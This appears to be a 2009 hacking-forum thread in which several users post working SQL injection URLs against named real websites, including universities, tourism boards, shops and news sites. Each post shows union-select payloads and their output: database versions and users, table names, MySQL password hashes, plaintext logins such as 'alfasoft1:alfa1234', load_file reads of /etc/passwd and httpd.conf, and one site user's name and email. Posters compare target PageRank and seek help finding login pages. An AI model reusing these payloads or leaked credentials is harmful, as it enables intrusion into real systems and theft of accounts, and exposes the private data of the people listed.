http://economics.wustl.edu/courses/courses.php?sem=sp09+union+select+table_name,2,3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+informa tion_schema.tables+--+
HAXTA4OK
06.05.2009, 23:32
http://www.quadrat.am/news_ds.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),da ta base(),use r()),6,7--
5.0.51a-community-nt:quadrat:root@localhost
mailbrush
06.05.2009, 23:47
http://www.sabahtourism.com/en/event.php?readID=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22+from+mysql.user&rd=true&do=readmore
belalang@localhost:diana:5.0.51a-log
http://www.sabahtourism.com/en/event.php?readID=-1+union+select+1,concat_ws(0x3a,user,password,file _priv),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22+from+mysql.user&rd=true&do=readmore
root:509492793f8aed39:Y
http://www.sabahtourism.com/en/event.php?readID=-1+union+select+1,load_file('/etc/passwd'),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22&rd=true&do=readmore
/etc/passwd
http://www.sabahtourism.com/en/event.php?readID=-1+union+select+1,load_file('/etc/httpd/conf/httpd.conf'),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22+from+mysql.user&rd=true&do=readmore
httpd.conf
Next...
http://www.web-gr.net/webdirectory/index.php?id=26+and+1=0+union+select+1,2,concat_ws (0x3a,user(),database(),version())webgrn80_jsalata @localhost:webgrn80_webgr:5.0.67-community
http://www.controlenggcollege.org/main.php?ID=9&InstituteId=10+union+select+1,2,3,4/*
Database Version: 5.0.18-nt
Database name: technogroup
User name: technogroup@localhost
HAXTA4OK
07.05.2009, 00:28
http://aviagit.am/hotels.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,versio n(),database(), user()),7--
5.0.67-community-log:aviagit_aviagit:aviagit_aviagit@localhost
http://aviagit.am/hotels.php?id=-1+union+select+1,2,3,4,5,group_concat(table_name), 7+from+information_schema.tables+group+by+tab le_schema+lim it+0,1--
Tables:
template1,top_images,hotels
_SEREGA_
07.05.2009, 01:57
SQL injection:
http://www.superwheels.net/evento.php?ID=-10+union+select+1,2,3,4,5,6,7--
version:
http://www.superwheels.net/evento.php?ID=-10+union+select+1,version(),3,4,5,6,7--
5.0.68-log
tables are output:
http://www.superwheels.net/evento.php?ID=-10+union+select+1,table_name,3,4,5,6,7+from+inform ation_schema.tables--
columns are output:
http://www.superwheels.net/evento.php?ID=-10+union+select+1,column_name,3,4,5,6,7+from+infor mation_schema.columns--
info:
http://www.superwheels.net/evento.php?ID=-10+union+select+1,concat_ws(0x3a,user(),database() ),3,4,5,6,7--
user() Sql138934@62.149.141.80
database() Sql138934_1
Lam3rsha
07.05.2009, 02:18
http://www.mariatk.ru/catalog.htm?cat_id=30+union+select+user(),2/*
Database Version: 4.0.27
Database name: mariya
User name: root@pm3.zenon.net
Assembler
07.05.2009, 06:28
http://www.tsarichanska.com/page.php?pn=-99999999999%20union%20select%20table_name%20%20fro m%20information_schema.tables%20limit%2019,1--
5.0.67 log
DezMond™
07.05.2009, 11:52
http://www.navarrocollege.edu/former.php?id=-159'+union+select+1,version(),3,4,5,6,7,8,9,10,11, 12,13,14+--+
4.1.20
HAXTA4OK
07.05.2009, 13:16
PR: 3
http://www.radhaus-am-rathaus.de/index.php?page=partner&id=1+union+select+1,concat_ws(0x3a,version(),datab ase(),u ser()),3,4,5,6,7,8,9--
5.0.45:radhaus_08:rad_user@localhost
tables:
------------------------------------------------------------------------
http://am-galerie.de/home.php?id=1&content_id=-12+union+sel ect+1,2,conca t_ws(0x3a,version(),database(),user()),4,5,6--&color=CAE29B
5.0.24-Debian_0.dotdeb.0-log:de9414:de9414@localhost
http://am-galerie.de/home.php?id=1&content_id=-12+union+select+1,2,group_concat(table_name),4,5,6 +fr om+infor mation_schema.tables+group+by+table_schema--&color=CAE29B
tables:
artists,content,images,menus
------------------------------------------------------------------------
PR: 4
http://www.apo-klein-am-markt.de/index.php?c=1&id=-1+union+select+1,concat_ws(0x3a,vers ion(),database(),u ser())--
(view the output in the HTML source)
4.0.27-log:DB105344:U105344@cohen.store
HAXTA4OK
07.05.2009, 14:05
PR: 4
http://www.nakoil.am/Groups.php?id=1+union+select+1,concat_ws(0x3a,vers ion(),data base(), user()),3--
5.0.67-community-log:nakoil_DB:nakoil_ash@localhost
http://www.patagoniaexpeditionrace.com/en/news_detail.php?news=-1+UNION+SELECT+1,2,3,4,5,concat(user(),0x3a,versio n(),database()),7,8,9,10,11,12,13
http://www.patagoniaexpeditionrace.com/en/news_detail.php?news=-1+UNION+SELECT+1,2,3,4,5,LOAD_FILE(0x2F6574632F706 173737764),7,8,9,10,11,12,13
sitio@cgi1101.int.bizland.net:5.0.45-logsitio
Skofield
07.05.2009, 16:43
http://www.garradhassan.com Page Rank 6
http://www.garradhassan.com/corporate/newsitem.php?story=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(), database(),user()),7--
version() - 5.0.51b-community-nt
database() - ghcom
user() - root@localhost
tables:
http://www.garradhassan.com/corporate/newsitem.php?story=-1+union+select+1,2,3,4,5,group_concat(table_name), 7+from+information_schema.tables--
http://www.garradhassan.com/corporate/newsitem.php?story=-1+union+select+1,2,3,4,5,concat_ws(0x3a,table_sche ma,table_name),7+from+information_schema.tables+wh ere+table_name=0x75736572--
mysql.user:
http://www.garradhassan.com/corporate/newsitem.php?story=-1+union+select+1,2,3,4,5,concat_ws(0x3a,user,passw ord),7+from+mysql.user--
root:373ba1c07f888b3b:3y35alphA
helpdesk:*246AAAE25BC090A8A06E3211EAD3827FA6A8819A :spooky
web:*B55160D1065FEAB0F8EEA92C8AD493C8DCCA537B:no idea :(
--------------------------------------------------------------------------------
http://dtincr.ph PR 5
http://dtincr.ph/news.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user())--
5.0.67-community:dtincr_db:dtincr_dtincr@localhost
_SEREGA_
07.05.2009, 18:02
SQL injection:
http://www.aprileonline.info/notizia.php?id=-11774+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16--
version:
http://www.aprileonline.info/notizia.php?id=-11774+union+select+1,2,3,4,5,version(),7,8,9,10,11 ,12,13,14,15,16--
5.0.27
tables are output using limit:
http://www.aprileonline.info/notizia.php?id=-11774+union+select+1,2,3,4,5,table_name,7,8,9,10,1 1,12,13,14,15,16+from+information_schema.tables--
columns are output using limit:
http://www.aprileonline.info/notizia.php?id=-11774+union+select+1,2,3,4,5,column_name,7,8,9,10, 11,12,13,14,15,16+from+information_schema.columns--
info:
http://www.aprileonline.info/notizia.php?id=-11774+union+select+1,2,3,4,5,concat_ws(0x3a,user() ,database()),7,8,9,10,11,12,13,14,15,16--
user() aprile_info@localhost
database() aprileonline_info
PR 7
http://www.daisy.org/news/news_detail.php?NewsId=-398+UNION+SELECT+1,2,3,4,5,6,7,concat_ws(0x3a,user (),version(),database()),9,10,11,12,13,14,15,16,17 ,18
daisyorg_kathy@localhost:5.0.75-percona-highperf-b12:daisyorg_daisy2
28 :In database daisyorg_daisy2 found table Contributor
DrAssault
07.05.2009, 18:34
http://www.delea.ch/en/content/eventidettgm.php?Id=63+union+select+1,2,3,4,5,6,7, 8,concat_ws(0x3a,user,password)+from+mysql.user/*
nicola:0c035f4940eaac57
HAXTA4OK
07.05.2009, 21:03
PR: 8, first time I've seen PR: 8 ;)
http://www.ufmg.br/nej/am/modules/content/index.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version (),database (),user()),5,6,7,8,9,10,11--
http://www.ufmg.br/nej/am/modules/content/index.php?id=-1+union+select+1,2,3,group_concat(table_name),5,6, 7,8,9,10,11+from+information_schema.tables+group+b y+table_schema+l imit+1,1- -
tables:
http://www.ufmg.br/nej/am/modules/content/index.php?id=-1+union+select+1,2,3,concat_ws(0x3a,uid,uname,logi n na me,name,email,user_avatar,pass,rank,level),5,6,7,8 ,9,10,11+from+nejs__users--
1:Lyslei Nascimento:lyslei::lyslei@ufmg.br:blank.gif:3f8454 b7f2c12cebb1622b6b0dfd1021:7:5
(no idea where to enter it; I found one login form, but this account doesn't work there)
whoever finds the login, PM me please))))
http://www.oboefm.ru/note_view.php?note=106&id_notes=14'+union+select+concat_ws(0x2f2a2a2f,dat abase(),version(),user()),2,3,4--+
Oboe FM =))
HAXTA4OK
07.05.2009, 21:15
PR: 6
http://www.pco.org.br/conoticias/ver_sessao.php?id=1&am=20 08-11'+union+select+concat_ws(0x3a,version(),dat abase(),user()),2,3,4,5,6,7,8/*
5.0.24a-locaweb-log:bd_pco:bd_pco@200.234.201.196
let's look at the tables))) but there's nothing interesting there))) bye
http://www.pco.org.br/conoticias/ver_sessao.php?id=1&am=2008-11'+un ion+select+table_name,2,3,4,5,6,7,8+from+informati on _schema.tables/*
------------------------------------------------------------------------
PR: 3
http://www.yerevaklur.am/tema.php?id=-1'+union+select+1,concat_ws(0x3a,database(),vers ion(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20/*
yerevaklur_lur:5.0.26-log:yerevaklur_lur@localhost
HAXTA4OK
07.05.2009, 21:47
PR: 4
http://www.sesc-am.com.br/atividades/3idade/programacao.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,database(),v ersion(),user()),6,7--
sesc_am:5.0.27:admin@localhost
tables
http://www.sesc-am.com.br/atividades/3idade/progr amacao.php?id=-1+union+select+1,2,3,4,group_concat(table_name),6, 7+from+info rmation_schema.tables+group+by+table_schem a--
------------------------------------------------------------------------
http://www.nature-ic.am/heating/project.php?b=2&id=-1+union+select+1,concat_ws(0x3a,da tabase(),version(),us er()),3,4,5,6,7,8,9--
natureic_heating:5.0.67-community-log:natureic_heating@localhost
http://www.nature-ic.am/heating/project.php?b=2&id=-1+union+select+1,group_concat(table_name),3,4,5,6, 7,8,9+from+informatio n_schema.tables+group+by+table_schema+limi t+1,1--
HAXTA4OK
07.05.2009, 22:32
PR: 6
http://www.24hours.ge/index.php?n=264&r=1&id=1+union+select+1,concat_ws(0x3a,database(),vers ion(),user()),3,4,5,6,7,8,9, 10--
24hours_eng:5.0.51-log:24hours@localhost
http://www.24hours.ge/index.php?n=264&r=1&id=1+union+select+1,table_name,3,4,5,6,7,8,9,10+fr om+ information_sch ema.t ables--
a bunch of tables
log_users
users
phpbb_users (couldn't find the forum at all)
-------------------------------------------------------------------------------
http://mitex.ge/index.php?lang=eng&request=news&id=-1+union+select+1,concat_ws(0x3a,versi on(),data ba se(),user()),3,4,5--
4.1.7-max-log:mitex:mitex@localhost
DrAssault
07.05.2009, 23:15
http://www.mobil-obchod.cz/category.asp?catcode=-13+union+select+1,2,3,4,group_concat(concat_ws(0x3 a,username,password)+separator+0x0a),6,7,8,9,10+fr om+users/*
alfasoft1:alfa1234
andy:andy7890
jirka:jirka456
everybody:everybody
HAXTA4OK
07.05.2009, 23:39
PR: 4
http://www.arigram.gr/en/info_frame.php?id=1+union+select+1,2,3,4,concat_ws (0x3a,database(),versio n(),us er()),6--
arigram_arigram:5.0.67-community:arigram_arigram@localhost
------------------------------------------------------------------------
PR: 2
if only they were all like this )))
http://www.greekmuscle.net/gr/profiles/profile.php?id=1+union+select+1,2,concat_ws(0x3a,d atabase(),version(),user()),4,5,6,7,8,9,10,11,12,1 3--&type=interviewGr
4.1.22-max-log:greekmuscle@68.178.254.189
Kimliksiz
08.05.2009, 02:58
http://www.ali.web.id/index.php?option=com_mambads&Itemid=ProgenTR&func=view&cacat=-1%20union%20select%201,concat(username,0x3a,passwo rd),3%20from%20mos_users--
admin:37538eb37d1b20e60cec3e0030139216 ??
http://www.kolckmann.de/web/index.php?option=com_gmaps&task=viewmap&Itemid
28&mapId=1&Itemid=28index.php?option=com_gmaps&task=viewmap&Itemid=57&%20mapId=-1/**/union/**/select/**/0,username,password,3,4,5,%206,7,8/**/from/**/jos_users/*
ADMIN : fc4cfabb7764cd3eb98cc4aa7d1a0a75 ??